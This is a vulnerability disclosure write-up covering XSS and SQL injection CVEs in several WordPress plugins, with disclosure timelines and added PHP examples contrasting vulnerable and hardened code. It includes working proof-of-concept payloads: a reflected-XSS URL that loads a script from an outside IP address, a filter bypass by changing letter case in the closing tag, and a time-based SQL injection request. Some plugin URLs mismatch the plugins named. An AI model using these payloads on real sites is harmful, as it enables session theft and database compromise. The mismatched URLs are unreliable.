WordPress Plugin Bug Hunting – Part 2

This is part 2 of 2 thus far. See here for part 1 written up by Aaron.

———————————————————————————————————————————————————————————————————————–

CVE-2020-25376 – Bulk Change V1.0 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/bulk-change/
Vulnerable Version: 1.0
Total Downloads: 3,215
Active Installations: N/A
Author: hmayaktigranyan

Description

The `s` GET parameter in bulk-change.php is vulnerable to reflected XSS attacks.

POC
/wp-admin/tools.php?page=bulk-change%2Fbulk-change.php&per_page=10&dosearch=Search+...&change_posttype&bctp_action&s="><script+src%3Dhttps%3A%2F%2F161.35.8.179%3A4443%2Fxssalert.js><%2FsCript>

Requesting this URL results in the following being injected:

Vulnerability

The Bulk Change page under Tools → Bulk Posts Change reads an `s` GET parameter and echoes it into the value attribute of a text input tag without sanitising it.

The `s` parameter does not normally appear in the URL, but it can be added manually to display text inside the “Keyword” input box, like so:

Closing off the input tag allows any other HTML tag to be injected, including `<script>` tags. Including a `</script>` closing tag, however, results in a security error:

However, changing the case of a single character in the closing tag removes this error and allows the JavaScript to execute.

[Figure: successful execution after changing the letter casing in the closing tag]

Timeline

18 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team

19 Jun 2020 – Reply from the WordPress Security team
19 Jun 2020 – WordPress Security team determines no patch will be applied by the original developer and the plugin is closed from further downloads
29 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25377 – Ceceppa Multilingua v1.5.17 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/bulk-change/
Vulnerable Version: 1.5.17
Total Downloads: 81,781
Active Installations: N/A
Author: Alessandro Senese

Description

The `tab` GET parameter in `settings.php` is vulnerable to reflected XSS attacks.

POC
/wp-admin/admin.php?page=ceceppaml-backup-page&tab="><script>alert(1)</script>

After closing the input tag with `">` in the `tab` parameter, we can inject arbitrary HTML tags, including `<script>` tags, to execute JavaScript code.

[Figure: XSS proof of concept]

Timeline

19 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team

19 Jun 2020 – Reply from the WordPress Security team
19 Jun 2020 – WordPress Security team determines no patch will be applied by the original developer and the plugin is closed from further downloads
31 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25375 – WP Smart CRM v1.8.7 – Authenticated Stored XSS – Multiple Vulnerabilities

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/wp-smart-crm-invoices-free/
Vulnerable Version: 1.8.7
Total Downloads: 16,200
Active Installations: N/A
Author: SoftradeWeb SNC

Description

Vulnerability 1

Business Name field: steps to replicate.

1. Go to the Customers tab.
   [Figure: WP Smart CRM drop down]
2. Create a new customer by clicking New customer at the bottom left of the page.
3. Add the payload <script>alert(1)</script> to the Business Name field and save the customer.
   [Figure: XSS Execution]
4. The page will reload and execute the payload.

 

Vulnerability 2

Tax Code field: steps to replicate.

1. Repeat steps 1 and 2 from the Business Name field vulnerability above.
2. Add the payload "><script>alert(1)</script> to the Tax Code field.
3. Fill out the mandatory fields and save the customer.

Other vulnerable fields

The following fields are also vulnerable to the same stored XSS:

  1. First Name field
  2. Address field
  3. Town field
  4. Phone field
  5. Mobile field
  6. Place of Birth field
  7. Web Site field
  8. VAT Number field
  9. Last Name field
  10. Fax field
  11. Email field
  12. Skype field

 

Timeline

20 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team

20 Jun 2020 – Reply from the WordPress Security team
28 Jul 2020 – WordPress Security team determines no patch will be applied by the original developer and the plugin is closed from further downloads
31 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25379 & CVE-2020-25380 – Recall Products v0.8 – Authenticated SQL injection and Stored XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/front-end-only-users/
Vulnerable Version: 0.8
Total Downloads: 1,018
Active Installations: N/A
Author: Mike Rooijackers

Authenticated SQL Injection

Description

Within the Recall Products plugin, the `manufacturer[]` POST parameter is vulnerable to SQL injection when submitting a deletion request.

POC
POST /wp-admin/admin.php?page=recall-manufacturer HTTP/1.1
Host: headache.zeroaptitude.com
Connection: close
Content-Length: 208
Cache-Control: max-age=0
Origin: https://headache.zeroaptitude.com
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://headache.zeroaptitude.com/wp-admin/admin.php?page=recall-manufacturer
Accept-Encoding: gzip, deflate
Accept-Language: en-AU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <cookies here>

page=recall-manufacturer&_wpnonce=55905377af&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drecall-manufacturer&action=delete&paged=1&manufacturer%5B%5D=(SELECT 2822 FROM (SELECT(SLEEP(5)))gsJu)&action2=-1
[Figure: SQLmap beginning to dump tables using the manufacturer parameter]

Vulnerable Code

[Figure: vulnerable PHP code]

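The vulnerable PHP survives only as a screenshot, so the following is an added example rather than the plugin's own code. It reproduces the shape of the bug the description gives (the `manufacturer[]` POST array joined straight into a delete query) beside a hardened handler that keeps only positive integer ids and binds each one through `$wpdb->prepare()`. The table name, the column name and the `FakeWpdb` stand-in are assumptions so that the file runs under plain `php` outside WordPress.

```php
<?php
// Added example, not the Recall Products plugin's own code. It reproduces the
// shape of the manufacturer[] deletion bug described above (POST array values
// concatenated into a DELETE ... IN (...) clause) beside a hardened version
// that validates each id and binds it through $wpdb->prepare(). The table and
// column names and the $wpdb stand-in below are assumptions so that the file
// runs under plain `php` outside WordPress.

// Stand-in for the WordPress $wpdb object (assumption). Real wpdb::prepare()
// supports %s, %d and %f and escapes strings; this copy implements only %d,
// which is all the hardened function needs, and records the last query
// instead of executing it.
class FakeWpdb
{
    public string $prefix = 'wp_';
    public string $last_query = '';

    public function prepare(string $sql, ...$args): string
    {
        // Like wpdb::prepare(), %d coerces every bound argument to an integer.
        return vsprintf($sql, array_map('intval', $args));
    }

    public function query(string $sql): int
    {
        $this->last_query = $sql;
        return 0; // no database behind the stand-in
    }
}

/** Vulnerable pattern: raw POST values are joined straight into the SQL string. */
function delete_manufacturers_vulnerable(FakeWpdb $wpdb, array $ids): string
{
    $list = implode(',', $ids);
    $wpdb->query("DELETE FROM {$wpdb->prefix}recall_manufacturer WHERE id IN ($list)");
    return $wpdb->last_query;
}

/** Hardened: keep only positive integers, then bind each one with a %d placeholder. */
function delete_manufacturers_safe(FakeWpdb $wpdb, array $ids): string
{
    $ids = array_values(array_filter(array_map('intval', $ids), fn ($i) => $i > 0));
    if ($ids === []) {
        return ''; // nothing valid to delete, so no query is run at all
    }
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}recall_manufacturer WHERE id IN ($placeholders)",
        ...$ids
    );
    $wpdb->query($sql);
    return $wpdb->last_query;
}

// Constructed request body in the shape of the PoC above: one real id plus the
// time-based payload. In a real handler these come from $_POST['manufacturer'],
// after check_admin_referer() and a current_user_can() check have passed.
$posted = ['3', '(SELECT 2822 FROM (SELECT(SLEEP(5)))gsJu)'];

$wpdb = new FakeWpdb();
// The vulnerable query carries the whole subselect into the IN list.
echo "vulnerable: ", delete_manufacturers_vulnerable($wpdb, $posted), "\n";
// The hardened query contains only the integer 3; intval() turns the payload
// into 0 and the filter drops it before any SQL is built.
echo "hardened:   ", delete_manufacturers_safe($wpdb, $posted), "\n";
```

Run it with `php example.php`. The point of the hardened version is that the nonce in the PoC (`_wpnonce`) only proves the request came from a logged-in user's form; it says nothing about the values in it, so the handler still has to validate and bind every id itself.
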
Stored XSS

Stored XSS occurs when creating a new manufacturer by clicking the “add new” tab and providing an XSS payload as the manufacturer name. The payload executes whenever a user visits the “manufacturer” tab.

[Figure: adding a new manufacturer but providing an XSS payload instead]
[Figure: execution of the XSS payload when visiting the manufacturer tab]

Timeline

27 Jul 2020 – Discovery and report submission to the WordPress Plugin Security Team

27 Jul 2020 – Reply from the WordPress Security team
10 Aug 2020 – Patch applied to fix the vulnerability
31 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-25378 – WP Floating Menu v1.3.0 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/front-end-only-users/
Vulnerable Version: 1.3.0
Total Downloads: 128,645
Active Installations: 10,000+
Author: AccessPress Themes

Description

The `id` GET parameter used by WP Floating Menu is not sanitised before being reflected back to the user, resulting in a reflected XSS vulnerability, as shown in the following example:

POC

The vulnerable code can be found in the wp-floating-menu/inc/backend/menu-actions/inner-fields/edit-menu-inner.php file.
The same potentially vulnerable code can be found in wp-floating-menu/inc/backend/template-actions/template-inner-fields/edit-template-inner.php

[Figure: vulnerable line echoing the `id` parameter into a hidden input tag]

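Every XSS in this write-up comes down to one output pattern, so one added example covers them all: the reflected cases (Bulk Change `s`, Ceceppa Multilingua `tab`, WP Floating Menu `id`) and the stored cases (the WP Smart CRM customer fields, the Recall Products manufacturer name). It is not code from any of those plugins. It shows request or database data written into HTML unescaped beside the escaped forms, and why a blocklist for `</script>` is not a fix given the case-changed closing tag used against Bulk Change. Parameter and field names come from the write-ups; the surrounding markup, the assumption that a menu `id` is numeric, and the stand-in definitions of `esc_attr()`, `esc_html()` and `absint()` (so the file runs under plain `php` outside WordPress) are mine.

```php
<?php
// Added example, not code from any plugin in this write-up. It shows the
// output pattern behind the reflected XSS bugs (Bulk Change `s`, Ceceppa
// Multilingua `tab`, WP Floating Menu `id`) and the stored XSS bugs (WP Smart
// CRM customer fields, Recall Products manufacturer name): request or database
// data written into HTML without escaping, beside the escaped forms. Parameter
// and field names come from the write-ups; the surrounding markup is assumed.

// Stand-ins so the file runs under plain `php` outside WordPress (assumption).
// The real esc_attr()/esc_html() also normalise pre-existing entities and
// check the charset; the core step, encoding < > " ' and &, is the same.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('absint')) {
    function absint($value): int
    {
        return abs((int) $value);
    }
}

/** Vulnerable: the parameter lands inside value="..." untouched (the Bulk Change pattern). */
function keyword_box_vulnerable(array $get): string
{
    $s = (string) ($get['s'] ?? '');
    return '<input type="text" name="s" value="' . $s . '">';
}

/** A blocklist is not a fix: it matches one exact string, which a case change in the closing tag walks past. */
function keyword_box_blocklist(array $get): string
{
    $s = str_replace('</script>', '', (string) ($get['s'] ?? ''));
    return '<input type="text" name="s" value="' . $s . '">';
}

/** Hardened: the value sits in an attribute, so escape for the attribute context. */
function keyword_box_safe(array $get): string
{
    $s = (string) ($get['s'] ?? '');
    return '<input type="text" name="s" value="' . esc_attr($s) . '">';
}

/** An id is assumed numeric: validate the type first, then escape anyway (the WP Floating Menu case). */
function hidden_id_safe(array $get): string
{
    $id = absint($get['id'] ?? 0);
    return '<input type="hidden" name="id" value="' . esc_attr((string) $id) . '">';
}

/** Stored data rendered as element text (a customer or manufacturer name) gets esc_html(). */
function name_cell_safe(string $stored_name): string
{
    return '<td>' . esc_html($stored_name) . '</td>';
}

// Constructed inputs in the shape of the payloads above.
$get = ['s' => '"><script>alert(1)</sCript>', 'id' => '7"><script>alert(1)</script>'];
$stored = '<script>alert(1)</script>';

echo keyword_box_vulnerable($get), "\n"; // the quote closes the attribute, the > closes the tag, the script runs
echo keyword_box_blocklist($get), "\n";  // the case-sensitive replace leaves </sCript> in place
echo keyword_box_safe($get), "\n";       // every < > and " is an entity, so the text stays inside the attribute
echo hidden_id_safe($get), "\n";         // absint() keeps only the leading digits of the tampered id
echo name_cell_safe($stored), "\n";      // the stored payload renders as literal text in the cell
```

Run it with `php example.php` and compare the five lines. The rule the examples follow is the one WordPress's own escaping helpers encode: choose the function by the context the data lands in (`esc_attr()` inside an attribute, `esc_html()` between tags, `esc_url()` for an href), and do it at output time, so stored data that slipped into the database unescaped is still harmless when rendered.
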
Timeline

28 Jul 2020 – Discovery and report submission to the WordPress Plugin Security Team

29 Jul 2020 – Reply from the WordPress Security team
16 Aug 2020 – Patch applied to fix the vulnerability
31 Aug 2020 – Public write up and CVE Submission
